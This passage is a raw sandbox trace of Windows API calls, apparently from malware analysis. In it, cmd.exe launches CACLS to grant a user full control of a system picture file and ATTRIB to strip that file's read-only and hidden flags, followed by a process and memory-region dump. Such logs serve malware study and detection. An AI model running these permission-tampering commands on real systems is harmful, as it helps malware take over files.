lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.697] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af4b8, lpFilePart=0x2af4b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af4b4*="Desktop") returned 0x18 [0183.697] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.697] FindFirstFileW (in: 
lpFileName="C:\\Users", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.697] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.697] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.697] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.697] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.698] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.698] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.698] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.698] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.698] GetEnvironmentStringsW () returned 0x430308* [0183.698] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.698] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.699] GetConsoleOutputCP () returned 0x1b5 [0183.699] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.699] GetUserDefaultLCID () returned 0x409 [0183.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="0") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="0") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="1") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.700] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.701] GetConsoleTitleW (in: lpConsoleTitle=0x4209b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.703] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0183.703] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.703] _wcsicmp 
(_String1="FOR", _String2="CACLS") returned 3 [0183.703] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0183.703] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.703] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.703] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.703] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.706] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.706] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.706] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.706] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.706] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.706] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.706] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.708] GetConsoleTitleW (in: lpConsoleTitle=0x2af28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.708] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.708] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.708] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.708] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.708] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.708] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.708] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.709] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.709] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.709] _wcsicmp (_String1="CACLS", 
_String2="PROMPT") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.709] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.709] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.709] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.709] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.709] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.709] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.709] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.710] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.710] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.710] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.710] _wcsicmp 
(_String1="CACLS", _String2="ERASE") returned -2 [0183.710] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.710] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.710] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.710] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.710] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.710] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.710] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.710] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.710] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.710] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.710] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.710] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.710] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.710] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.711] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.711] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.711] _wcsicmp 
(_String1="CACLS", _String2="TITLE") returned -17 [0183.711] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.711] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.711] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.711] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.711] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.711] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.711] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.711] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.711] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.711] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.711] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.711] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.711] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.711] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.712] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.712] SetErrorMode (uMode=0x0) returned 0x0 [0183.712] SetErrorMode (uMode=0x1) returned 0x0 [0183.712] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x431e98, lpFilePart=0x2aedac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2aedac*="Desktop") returned 0x18 [0183.712] SetErrorMode (uMode=0x0) returned 0x1 [0183.712] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.712] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.719] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.719] GetLastError () returned 0x2 [0183.719] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.719] GetLastError () returned 0x2 [0183.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x432180 [0183.719] FindClose (in: hFindFile=0x432180 | out: hFindFile=0x432180) returned 1 [0183.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.720] GetLastError () returned 0x2 [0183.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x432180 [0183.720] FindClose (in: hFindFile=0x432180 | out: hFindFile=0x432180) returned 1 [0183.720] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.720] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.720] GetConsoleTitleW (in: lpConsoleTitle=0x2af020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.720] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef70 | out: lpAttributeList=0x2aeea8, lpSize=0x2aef70) returned 1 [0183.720] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef68, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea8, lpPreviousValue=0x0) returned 1 [0183.720] GetStartupInfoW (in: lpStartupInfo=0x2aee64 | out: lpStartupInfo=0x2aee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.720] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.721] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef50 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2aef50*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda8, dwThreadId=0x7d4)) returned 1 [0183.724] CloseHandle (hObject=0x4c) returned 1 [0183.724] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.724] GetEnvironmentStringsW () returned 0x430308* [0183.724] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.724] WaitForSingleObject (hHandle=0x50, 
dwMilliseconds=0xffffffff) returned 0x0 [0183.785] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee44 | out: lpExitCode=0x2aee44*=0x0) returned 1 [0183.785] CloseHandle (hObject=0x50) returned 1 [0183.785] _vsnwprintf (in: _Buffer=0x2aef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee50 | out: _Buffer="00000000") returned 8 [0183.785] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.785] GetEnvironmentStringsW () returned 0x432410* [0183.786] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.786] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.786] GetEnvironmentStringsW () returned 0x432410* [0183.786] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.786] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea8 | out: lpAttributeList=0x2aeea8) [0183.786] GetConsoleTitleW (in: lpConsoleTitle=0x2af28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.786] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.786] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.786] GetLastError () returned 0x2 [0183.786] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.787] 
GetLastError () returned 0x2 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x42e4d8 [0183.787] FindClose (in: hFindFile=0x42e4d8 | out: hFindFile=0x42e4d8) returned 1 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.787] GetLastError () returned 0x2 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x42e4d8 [0183.787] FindClose (in: hFindFile=0x42e4d8 | out: hFindFile=0x42e4d8) returned 1 [0183.787] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.787] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.787] GetConsoleTitleW (in: lpConsoleTitle=0x2af020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.787] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef70 | out: lpAttributeList=0x2aeea8, lpSize=0x2aef70) returned 1 [0183.787] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea8, lpPreviousValue=0x0) returned 1 [0183.787] GetStartupInfoW (in: lpStartupInfo=0x2aee64 | out: lpStartupInfo=0x2aee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, 
hStdOutput=0x0, hStdError=0x1000000)) [0183.787] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.787] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef50 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessInformation=0x2aef50*(hProcess=0x4c, hThread=0x50, dwProcessId=0x448, dwThreadId=0x608)) returned 1 [0183.789] CloseHandle (hObject=0x50) returned 1 [0183.789] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.789] GetEnvironmentStringsW () returned 0x432410* [0183.789] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.789] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.822] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aee44 | out: lpExitCode=0x2aee44*=0x0) returned 1 [0183.822] CloseHandle (hObject=0x4c) returned 1 [0183.822] _vsnwprintf (in: _Buffer=0x2aef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee50 | out: _Buffer="00000000") returned 8 [0183.822] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.822] GetEnvironmentStringsW () returned 0x432410* [0183.822] FreeEnvironmentStringsW 
(penv=0x432410) returned 1 [0183.822] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.822] GetEnvironmentStringsW () returned 0x432410* [0183.822] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.822] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea8 | out: lpAttributeList=0x2aeea8) [0183.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.822] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.822] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.823] SetConsoleInputExeNameW () returned 0x1 [0183.823] GetConsoleOutputCP () returned 0x1b5 [0183.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.823] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.823] exit (_Code=0) Process: id = "359" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "358" os_parent_pid = "0xe50" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26051 start_va = 0xf0000 end_va = 0xf8fff entry_point = 0xf0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26052 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26056 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26058 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26059 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26060 
